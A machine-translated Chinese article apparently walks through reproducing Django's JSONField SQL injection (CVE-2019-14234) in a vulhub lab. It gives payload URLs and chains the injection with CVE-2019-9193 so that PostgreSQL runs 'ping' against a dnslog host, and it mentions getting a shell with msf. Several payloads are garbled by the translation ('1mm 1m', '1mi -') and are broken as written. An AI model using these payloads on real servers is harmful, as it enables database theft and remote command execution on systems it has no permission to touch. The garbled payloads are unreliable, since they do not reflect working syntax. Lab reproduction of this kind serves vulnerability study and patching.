Shulou(Shulou.com)06/01 Report--

This article will explain in detail how the reproduction of Django JSONField SQL injection vulnerability CVE-2019-14234 is. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Introduction to 0x00

Django is a popular open source web framework written by Python, and many websites and app are based on Django. Django adopts the framework pattern of MTV, namely model M, view V and template T. with Django, programmers can easily and quickly create high-quality, easy-to-maintain, database-driven applications. And Django also contains many powerful third-party plug-ins, which makes Django have strong expansibility.

Overview of 0x01 vulnerabilities

The vulnerability requires that the developer uses JSONField/HStoreField, and the user can control the key name of the queryset query, and inject SQL statements in the location of the key name.

Django is usually paired with a postgresql database, and JSONField is a data type of that database. The reason for this vulnerability lies in the implementation of the JSONField class in Django. The most essential function of Django's model is to generate SQL statements, while when Django generates sql statements through JSONField, it is through simple string concatenation.

Get the KeyTransform class through the JSONField class and generate the location of the sql statement.

Where key_name is a controllable string, and the resulting statement is WHERE (field- >'[key_name]') = 'value', so SQL injection can be done.

0x02 affects version

Django

1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4

0x03 environment building

Online environment:

Forward this article to moments and send screenshots to the official account.

Build on your own:

Directly use vulhub's docker environment to build

Git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up-d

If you can access the http://ip:8000 normally, it means that the construction is successful.

0x04 vulnerability exploitation

Through the analysis of the code, we can know that if you use JSONField in your Django and the "key name" of the query is controllable, you can do SQL injection.

Visit http://ip:8000/admin

Enter the user name admin, password a123123123

Then visit

Http://ip:8000/admin/vuln/collection/

Then construct URL to query

Http://ip:8000/admin/vuln/collection/?detail__a%27b=123

You can see that the injection has been successful, and you can see the constructed SQL statement

To further verify the injection statement, we continue to construct

Http://ip:8000/admin/vuln/collection/?detail__title')='1' or 1mm 1m

The key part of the sql statement generated in the background is

WHERE ("vuln_collection". "detail"-> 'title') =' 1' or 1mi -') =% s

Since or 1 is always true, all results should be returned, and the page returns as expected, as shown in the following figure

In the next step, combined with CVE-2019-9193, we try to inject commands and construct url as follows

Http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1% 3bcreate table cmd_exec (cmd_output text) -% 20

Although the page result reported an error, the reason for the error is no results to fetch, indicating that our statement has been executed

Then use dnslog to detect whether the command can be executed

Http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 3bcopy cmd_exec FROM PROGRAM 'ping c2pn4v.dnslog.cn'--%20

Traffic detected successfully

The postgresql database docker in the reproduction environment does not have external port mapping. If it is open or in the real environment, you can also combine msf to getshell through CVE-2019-9193.

On the Django JSONField SQL injection vulnerability CVE-2019-14234 recurrence is how to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.